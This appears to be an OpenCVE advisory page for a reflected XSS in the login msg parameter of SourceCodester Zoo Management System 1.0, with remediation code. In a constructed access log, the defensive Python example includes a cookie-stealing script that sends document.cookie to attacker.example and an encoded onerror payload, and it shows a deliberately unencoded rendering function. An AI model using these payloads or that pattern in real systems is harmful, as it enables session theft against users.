Description
A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
Published: 2026-04-01
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting
Action: Apply Patch
AI Analysis

Impact

The Zoo Management System version 1.0 contains a reflected cross‑site scripting flaw in its login page. An attacker can place script or HTML in the msg query parameter, which the application writes into the page without HTML encoding. When a victim opens the crafted URL, the injected script runs in the victim's browser within the application's origin, where it can read the login form and capture credentials as they are typed, deface the page, or redirect the user elsewhere. Because the payload travels in the URL rather than being stored, each victim has to be induced to open the attacker's link. The weakness is CWE‑79 (improper neutralization of input during web page generation): the defect is missing output encoding, not a failed input check, and it compromises confidentiality and integrity on the client side rather than on the server.

Affected Systems

The vulnerability is reported only in SourceCodester Zoo Management System version 1.0. NVD tracks the same product under both the Sourcecodester and Pushpam02 vendor names (see the CPE in the history below), so asset inventories should match on either; no other products or versions are reported to be affected.

Risk and Exploitability

The CVSS 3.1 base score of 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) indicates moderate severity: the attack is reachable over the network and needs no privileges, but it requires user interaction, and the scope change reflects that the script runs in the victim's browser rather than on the server. The EPSS score below 1 % and the SSVC assessment (Exploitation: none, Automatable: no) suggest a low probability of widespread exploitation at present. The flaw is nonetheless trivial to trigger: an attacker only needs a target to open a crafted link, for example through a phishing message, so exposed instances remain a live risk. No vendor patch was available at the time of analysis, and unpatched systems stay vulnerable until one is released or the login page is fixed locally.

Generated by OpenCVE AI on April 7, 2026 at 21:05 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the vendor’s patch for Zoo Management System v1.0 once it becomes available; until then, fix the login page locally
  • HTML‑encode the msg parameter at the point where it is written into the page (this is the primary fix; the encoding must cover <, >, &, and both quote characters), or remove the reflection entirely
  • Prefer passing a short message code in msg and mapping it server‑side to fixed text, so untrusted input never reaches the HTML at all
  • Deploy a Content Security Policy that disallows inline script as defense in depth; it does not replace output encoding
  • Treat server‑side character filtering as secondary: blocklists of “dangerous” characters are routinely bypassed, whereas an allowlist of expected msg values is reliable
  • Monitor web server logs for requests whose msg value, after URL‑decoding, contains HTML metacharacters or event‑handler attributes; decode repeatedly, since double‑encoded payloads hide from a single pass
  • If the msg parameter is not essential, remove it from the login URL to eliminate the attack surface
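
As an added illustration (not code from the Zoo Management System, whose source is not shown on this page), the following Python puts the reflection pattern the description refers to beside two hardened forms, a CSP header for the defense‑in‑depth step, and a scanner for the log‑monitoring step. The page names neither the login page's path nor the server language, so the `/login.php` path in the constructed log lines, the message codes in `LOGIN_MESSAGES`, and all function names are assumptions. The scanner deliberately decodes until stable so that a double‑encoded payload (`%253C` for `<`) is caught, which a single decode misses.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Message codes the login page is assumed to accept (hypothetical; the real
# application's codes are not shown on the advisory page).
LOGIN_MESSAGES = {
    "invalid": "Invalid username or password.",
    "logout": "You have been logged out.",
}


def render_login_vulnerable(msg: str) -> str:
    """The pattern the advisory describes: msg lands in the HTML unencoded."""
    return f'<div class="alert">{msg}</div>'


def render_login_escaped(msg: str) -> str:
    """Minimal fix: encode <, >, &, " and ' so msg can never open a tag or attribute."""
    return f'<div class="alert">{html.escape(msg, quote=True)}</div>'


def render_login_allowlist(msg_code: str) -> str:
    """Stronger fix: msg carries only a key; the text shown comes from the server."""
    text = LOGIN_MESSAGES.get(msg_code)
    if text is None:
        return ""  # unknown code: show nothing rather than reflect it
    return f'<div class="alert">{html.escape(text, quote=True)}</div>'


# Defense in depth for the CSP bullet: blocks inline <script> and event handlers
# even if a reflection is missed. Tighten 'self' to the host that really serves JS.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                               "object-src 'none'; base-uri 'none'",
}

# --- log monitoring ---------------------------------------------------------

# Apache/nginx combined-format request line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Tag delimiters, quotes, the javascript: scheme, or an HTML event-handler attribute.
SUSPICIOUS_RE = re.compile(r"""[<>"']|javascript:|\bon\w+\s*=""", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until stable so %253C (double-encoded '<') is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_msg_requests(log_lines):
    """Return (client_ip, decoded msg) for requests whose msg looks like markup."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs already strips one layer of percent-encoding.
        for value in parse_qs(query, keep_blank_values=True).get("msg", []):
            decoded = fully_decode(value)
            if SUSPICIOUS_RE.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


# Constructed sample log lines (not real traffic; /login.php is an assumed path).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [01/Apr/2026:10:00:01 +0000] "GET /login.php?msg=invalid HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Apr/2026:10:00:02 +0000] "GET /login.php?msg=%3Cscript%3Edocument.location%3D%27http%3A//attacker.example/%3F%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Apr/2026:10:05:00 +0000] "GET /login.php?msg=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 2100 "-" "curl/8.0"',
    '192.0.2.9 - - [01/Apr/2026:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    print("vulnerable:", render_login_vulnerable(payload))
    print("escaped:   ", render_login_escaped(payload))
    print("allowlist: ", render_login_allowlist("invalid"), "|", repr(render_login_allowlist(payload)))
    for ip, value in suspicious_msg_requests(SAMPLE_ACCESS_LOG):
        print("suspicious msg from", ip, "->", value)
```

In a PHP application the equivalent of `html.escape(..., quote=True)` is `htmlspecialchars($msg, ENT_QUOTES, 'UTF-8')` applied where msg is echoed. The allowlist variant also simplifies monitoring: once msg may only hold a known code, any other value in the logs is anomalous and the metacharacter heuristic (which can false‑positive on legitimate text containing quotes or a word starting with "on" before an equals sign) is no longer needed.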

Advisories

No advisories yet.

History

Wed, 08 Apr 2026 20:15:00 +0000

Type Values Removed Values Added
Title Reflected XSS in SourceCodester Zoo Management System Login

Tue, 07 Apr 2026 15:15:00 +0000

Type Values Removed Values Added
First Time appeared Pushpam02
Pushpam02 zoo Management System
CPEs cpe:2.3:a:pushpam02:zoo_management_system:1.0:*:*:*:*:*:*:*
Vendors & Products Pushpam02
Pushpam02 zoo Management System

Fri, 03 Apr 2026 10:15:00 +0000

Type Values Removed Values Added
First Time appeared Sourcecodester
Sourcecodester zoo Management System
Vendors & Products Sourcecodester
Sourcecodester zoo Management System

Fri, 03 Apr 2026 06:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 02 Apr 2026 20:30:00 +0000

Type Values Removed Values Added
Title Reflected XSS in SourceCodester Zoo Management System Login
Weaknesses CWE-79

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
References
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}


Subscriptions

Pushpam02 Zoo Management System
Sourcecodester Zoo Management System
MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-04-01T15:04:04.957Z

Reserved: 2026-03-04T00:00:00.000Z

Link: CVE-2026-30526

Vulnrichment

Updated: 2026-04-01T15:02:11.629Z

NVD

Status : Analyzed

Published: 2026-04-01T15:22:59.277

Modified: 2026-04-07T12:05:46.750

Link: CVE-2026-30526

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-08T19:59:59Z

Weaknesses